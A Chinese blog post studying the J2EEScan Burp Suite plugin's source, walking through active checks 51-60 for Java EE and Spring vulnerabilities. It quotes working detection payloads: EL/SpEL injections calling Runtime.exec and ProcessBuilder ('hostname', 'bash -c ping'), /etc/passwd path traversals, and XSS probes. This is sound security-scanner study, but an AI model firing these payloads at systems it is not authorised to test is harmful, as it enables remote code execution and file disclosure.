【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)

最新推荐文章于 2023-08-07 08:30:00 发布
最新推荐文章于 2023-08-07 08:30:00 发布
阅读量565 收藏
点赞数
分类专栏: BurpSuite插件 文章标签: java-ee 学习 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/126925868
版权

【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)

前言

插件开发学习第10套。前置文章:

【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)

分析

【51】PivotalSpringTraversal CVE-2014-3625

路径

private static final List<String> staticURLFolders = Arrays.asList(
            "/resources/",
            "/files/",
            "/upload/",
            "/static/",
            "/content/",
            "/html/",
            "/deploy/"
    );

先判断真实的路径中有没有上述的path

        for (String staticResourceFolder : staticURLFolders) {

            if (currentPath.contains(staticResourceFolder)) {

然后将原始的HTTP做一个替换

                String mutatedHTTPRequest = mutator(HTTPRequest, staticResourceFolder, staticResourceFolder + INJ);

替换的payload是

    private static final String INJ = "file:/etc/passwd";

mutator函数就是一个找正则然后replace

    private String mutator(String httpRequest, String staticResourceFolder, String payload) {
        return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
    }

【52】PrimeFacesELInjection - CVE-2017-1000486

payload

        PAYLOADS.add("/javax.faces.resource/j2eescan.xhtml?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
        PAYLOADS.add("/javax.faces.resource/j2eescan.jsf?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);

    private static final String INJ_TEST = "uMKljPgnOTVxmOB%2bH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVYjEh7SE3F4WmfKUle6apy2QGwABuVlzurPsgFxYP0G3b1dDqmgmxMw%3d%3d";

match返回包则存在漏洞

   if (header.contains("J2EESCANPRIME")) {

这是个RCE
关键是这个pfdrid参数,是EL表达式的加密结果。
这里payload是加密下面的表达式,所以判断返回包是看headers

"${facesContext.getExternalContext().setResponseHeader(\\\"J2EESCANPRIME\\\",\\\"primefaces\\\")}"

默认密码是

Default = primefaces

利用工具看这个

https://github.com/pimps/CVE-2017-1000486

【53】RESTAPISwagger

REST API Swagger 的相关问题
相关路径

    private static final List<String> SWAGGER_APIS = Arrays.asList(
            "/swagger-ui.html",
            "/swagger/swagger-ui.html",
            "/api/swagger-ui.html",
            "/swagger/index.html",
            "/%20/swagger-ui.html"
    );

这个我们见得比较多了,这里面能拿到服务端的一些API构造。
match

 private static final byte[] GREP_STRING = "<title>Swagge".getBytes();

【54】Seam2RCE(Jboss) - CVE-2010-1871

JBoss seam2的模板注入
payload

 byte[] rawSimpleRequestSeam = helpers.addParameter(rawRequest,
                    helpers.buildParameter("actionOutcome",
                            "/pwd.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}", IParameter.PARAM_URL)
            );

match的是hostname?

    private static final byte[] GREP_STRING_L = "java.lang.UNIXProcess".getBytes();
    private static final byte[] GREP_STRING_W = "java.lang.ProcessImpl".getBytes();

上面的payload是直接反射取
下面这个是遍历取,有一点绕过的感觉,

        byte[] rawRequestSeam = helpers.addParameter(rawRequest,
                        helpers.buildParameter("actionOutcome",
                                "/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" + i + "].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('hostname')}}", IParameter.PARAM_URL)
                );

match一样

【55】 SnoopResource

看着像是GET请求的XSS
PATH

    private static final List<String> SNOOP_PATHS = Arrays.asList(
            "/snoop.jsp?" + XSS_PAYLOAD,
            "/examples/jsp/snp/snoop.jsp?" + XSS_PAYLOAD,
            "/examples/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/j2ee/servlet/SnoopServlet?" + XSS_PAYLOAD,
            "/jsp-examples/snp/snoop.jsp?" + XSS_PAYLOAD
    );

payload用的h1标签

    private static final String XSS_PAYLOAD = "<h1>j2eescan";

有意思的是
match如果是

    private static final byte[] GREP_STRING = "Path translated".getBytes();

则是低危
如果是

<h1>j2eescan";

就是中危

【56】SpringBootActuator

遍历Path

    private static final List<String> SPRINGBOOT_ACTUATOR_PATHS = Arrays.asList(
            "/health",
            "/manager/health",
            "/actuator",
            "/actuator/jolokia/list",
            "/jolokia/list",
            "/env"
    );

match这几个

        private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "{\"status\":\"UP\"}".getBytes(),
            "{\"_links\":".getBytes(),
            "org.spring".getBytes(),
            "java.vendor".getBytes()
    );

SpringBoot 的内存泄露吧,之前因为这个页面泄露了大量用户token能直接接管用户账号,所以也并不是他描述的low,需要实际去看。

【57】SpringBootRestRCE cve-2017-8046

首先POST换成PATCH(这里GET还不行?)

            headers.set(0, firstHeader.replaceFirst("POST ", "PATCH "));

换个contenttype和accept

            List<String> headersWithContentTypePatch = HTTPParser.addOrUpdateHeader(headers, "Content-type", "application/json-patch+json");
            List<String> headersWithContentTypePatchAndAccept = HTTPParser.addOrUpdateHeader(headersWithContentTypePatch, "Accept", "*/*");

发送payload

            String finalPayload = "[{ \"op\" : \"replace\", \"path\" : \"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(" + payload + ").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x\", \"value\" : \"j2eescan\" }]";

无回显的话payload可以用ping dns来match

【58】SpringCloudConfigPathTraversal cve-2020-5410


2020年的洞
Spring Cloud Config的目录穿越,比较好构造
payload

    private static final List<String> SPRINGCLOUD_TRAVERSALS = Arrays.asList(
            "/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23"
    );

match passwod就行

【59】 SpringDataCommonRCE cve-2018-1273

https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c

这是个spel表达式注入漏洞
补丁大致就是将StandardEvaluationContext替代为SimpleEvaluationContext,由于StandardEvaluationContext权限过大,可以执行任意代码,会被恶意用户利用。
SimpleEvaluationContext的权限则小的多,只支持一些map结构,通用的jang.lang.Runtime,java.lang.ProcessBuilder都已经不再支持,详情可查看SimpleEvaluationContext的实现。
在这里插入图片描述

payload

        String injection = "[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"%s\")]=";

替换的方式是

        String updatedBody = requestBody.replace("=", finalPayload);

在这里插入图片描述

【60】SpringWebFlowDataBindExpression CVE-2017-4971

Spring WebFlow 2.4.0 - 2.4.4
payload一把梭

        String injection = "_(new java.lang.ProcessBuilder(\"bash\",\"-c\",\"ping -c 3 %s\")).start()";

在这里插入图片描述
触发的
触发位置是提交表单。

_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云Linux服务器漏洞修复记录2020/09/24
u010148324的博客
09-24 1380
CVE-2017-7895 Linux kernel NFSv2和NFSv3服务器安全绕过漏洞 yum update kernel yum update kernel-devel yum update kernel-firmware yum update kernel-headers CVE-2017-11176 9.8 Linux kernel 'mq_notify'内存错误引用漏洞 CVE-2017-7542 5.5 Linux kernel 'ip6_find_1stfragopt'函数本地拒绝服务
burp插件-J2EEScan-1.2.5
05-30
编译好的burp插件J2EEScan-1.2.5,包含依赖库,可直接导入burp使用
【spring漏洞复现】CVE-2016-4977+CVE-2017-8046+CVE-2017-4971+CVE-2018-1270+CVE-2018-1273远程命令执行漏洞
serendipity1130的博客
09-01 574
1.CVE-2016-4977 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language(SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 1.访问网址: http://192.168.225.139:8080/oauth/authorize?response_type=${233*233}&client
漏洞&修复规范描述
最新发布
数据安全学习分享
08-07 856
严重不安全系统高危不安全系统中危不安全系统低危不安全系统安全系统严重漏洞高危漏洞中危漏洞低危漏洞认证应用主机APP代码web 后台系统弱口令详情由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,例如上传 webshell,获取敏感数据,另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作。造成的危害攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。修复建议用户层面系统层面ft
漏洞复现—Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_41438728的博客
11-17 246
转载来源:https://blog.csdn.net/weixin_45556536/article/details/109677547
[漏洞] CVE-2017-1000364/CVE-2017-1000365/CVE-2017-1000366
唐僧没有肉的博客
08-03 2888
CVE-2017-1000365 CVE-2017-1000365为次级漏洞,主要漏洞是CVE-2017-1000364(针对于内核)和 CVE-2017-1000366(针对于 glibc)。   # 我生产环境都是rhel6 # 升级前测试: # kernel升级:   [root@standbysrc]# rpm -Uvh dracut-* ke
BurpSuite插件开发学习J2EEScan - 汇总篇(主动+被动1-76)
热门推荐
HWHXY的博客
09-19 1万+
为了方便查阅,将下列文章合并
2017首届全球华人网络安全技能大赛-web-writeup
dengzhasong7076的博客
06-12 720
springcss https://github.com/ilmila/springcss-cve-2014-3625 可以这样获取到flag:http://218.2.197.232:18015/spring-css/resources/file:/etc/flag php序列化 http://wooyun.jozxing.cc/static/drops/tips-3909.html ...
Burpsuite主动扫描New Scan详细解析
qq_60115503的博客
05-11 3672
Burpsuite简介 Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。
BurpSuite学习-扫描
weixin_49349476的博客
04-24 2286
Burpsuite中,扫描分为主动扫描和被动扫描主动扫描主要针对客户端的漏洞和服务端的漏洞。被动扫描针对提交的密码为未加密的明文。不安全的cookie的属性、例如缺少HttpOnly和安全标志、cookie的范围缺失等
Burp Suite-第七章 如何使用Burp Scanner
weixin_44122303的博客
07-24 2375
BurpScanner的功能主要是用来自动检测web系统的各种,我们可以使用BurpScanner代替我们手工去对系统进行普通漏洞类型的渗透测试,从而能使得我们把更多的精力放在那些必须要人工去验证的漏洞上。在使用BurpScanner之前,我们除了要正确配置BurpProxy并设置浏览器代理外,还需要在BurpTarget的站点地图中存在需要扫描的域和URL模块路径。如下图所示。...
J2EEScan:J2EEScan是Burp Suite Proxy的插件。 该插件的目的是在对J2EE应用程序进行Web应用程序渗透测试期间提高测试覆盖率
05-04
J2EEScan-J2EE安全扫描仪Burp Suite插件 什么是J2EEScan J2EEScan是的插件。 该插件的目的是在对J2EE应用程序进行Web应用程序渗透测试期间提高测试覆盖率。 它是如何运作的? 该插件已完全集成到Burp Suite扫描仪中; 它添加了80多个独特的安全测试用例和新策略来发现不同类型的J2EE漏洞。 如何安装 ? 在“选项”->“会话”的“ Cookie jar”部分中,启用“扫描器”和“扩展器”字段 在Burp Extender选项卡中加载J2EEscan jar 该插件至少需要Java 1.7 贡献者: 特别感谢 发行说明 版本2.0.0beta.2 添加了对AJP Tomcat GhostCat的检查(CVE-2020-1938) 改进对Apache Tomcat EoL的检测 改进的Jackson CVE-2017-7525反序
Burpsuite-UAScan:burpsuite插件:被动进行未授权访问扫描
05-23
Burpsuite插件:被动方式进行未授权访问漏洞(越权)的扫描 被动扫描经过Burpsuite的每一个请求 通过修改Cookie头重新访问判断是否存在未授权访问(越权)问题 如果扫描到未授权访问的URL会显示到空白区域中 采用...
Burpsuite-JSScan:burpsuite插件主动和被动进行JS扫描并分析其中的可利用点
05-23
burpsuite插件主动和被动进行JS扫描 目前实现了主动扫描和被动扫描 主动扫描模块使用了珍藏字典 被动扫描模块将会分析每一个经过burpsuite的请求,如果是js文件就会记录 排除常见的JS库,只分析自定义JS,有效发现...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效,非常好用老版的BurpSuite和新版的都可以使用。祝大家挖洞顺利(工具仅用于学习交流)
burpsuite分块传输插件chunked-coding-converter.0.2.1.jar
01-25
burpsuite分块传输插件,一键生成分块传输请求,用于bypass waf等
vulhub-weblogic漏洞复现系列CVE-2017-10271、CVE-2018-2628、CVE-2018-2894
weixin_43071873的博客
11-20 1351
领导给了任务把vulhub里边的靶场都玩一玩。那就顺便做个系列发出来吧。 CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 weak_password CVE-2014-4210(ssrf)因为vulhub的问题,redis一直启动不了,所以没复现出来。等以后更新一下vulhub之后如果可以再补充。 CVE-2017-10271 1、漏洞详情: Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Securi
Spring Data REST 远程代码执行漏洞(CVE-2017-8046)分析与复现
一个有情怀的程序猿博客
06-30 1033
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
【jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞
serendipity1130的博客
08-31 883
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据: javac -cp .:common
burpsuite插件
07-27
6. J2EEScan:用于检测和利用Java EE应用程序中的漏洞的插件。 7. Retire.js:用于检测应用程序中使用的旧版本JavaScript库和框架的插件。 这只是一小部分Burp Suite插件,还有很多其他插件可以根据您的需求进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值